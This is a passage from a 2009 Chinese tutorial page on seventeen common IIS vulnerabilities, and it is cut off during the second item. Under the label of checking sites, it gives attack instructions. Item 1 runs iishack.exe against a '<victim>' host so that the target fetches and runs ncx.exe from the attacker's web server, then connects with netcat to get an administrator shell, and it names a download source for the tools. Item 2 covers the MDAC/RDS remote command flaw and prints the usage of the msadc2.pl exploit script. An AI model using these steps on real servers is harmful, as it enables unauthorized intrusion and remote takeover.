当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > IIS的十七个常见漏洞

安全防护
简单解析Linux系统防火墙框架
Linux操作系统下防范黑客的实用技巧
坚固Windows组策略 有效阻止黑客
15个技巧保护IIS Web服务器
分级防御对Linux服务器的攻击
服务器管理最容易犯的十大错误
Web站点的Win服务器安全解决方案
加强企业Linux系统安全的若干方法
安全设置IIS服务器的三个小技巧
安全设置微软IIS服务器的三个小技巧
7个极具杀伤力的Linux命令大全
Apache+Proftpd虚拟主机的安全问题
学会判断Web安全网关的性能
技巧:加固外网上的IIS服务器安全
研究Linux下Firewall防火墙的配置
加一道防护网:Win2008的高级防火墙
DDoS防范和全局网络安全网络的应对
阻断拒绝服务攻击
用抓包的方法解决ARP病毒欺骗攻击
Windows服务器安全维护注意八要点

安全防护 中的 IIS的十七个常见漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 57 ::
收藏到网摘: n/a

1. iis4hack缓冲溢出  
     主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序  在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 
                 
 c:>iishack.exe <victim> 80 <your web server>/ncx.exe 
                  
然后你就使用netcat来连接你要检测的服务器: 
                  
c:>nc <victim> 80  
 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip 
                 
 2.msadc  
     IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 
                  [quack@chat quack]$ perl msadc2.pl -h 
                  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 
                  Usage: msadc.pl -h <host> { -d <delay> -X -v } 
                  -h <host> = host you want to scan (ip or domain) 
                  -d <seconds> = delay between calls, default 1 second 
                  -X = dump Index Server path table, if available 
                  -N = query VbBusObj for NetBIOS name 
                  -V = use VbBusObj instead of ActiveDataFactory 
                  -v = verbose 
                  -e = external dictionary file for step 5 
                  -u <\hostsharefile> = use UNC file 
                  -w = Windows 95 instead of Windows NT 
                  -c = v1 compatibility (three step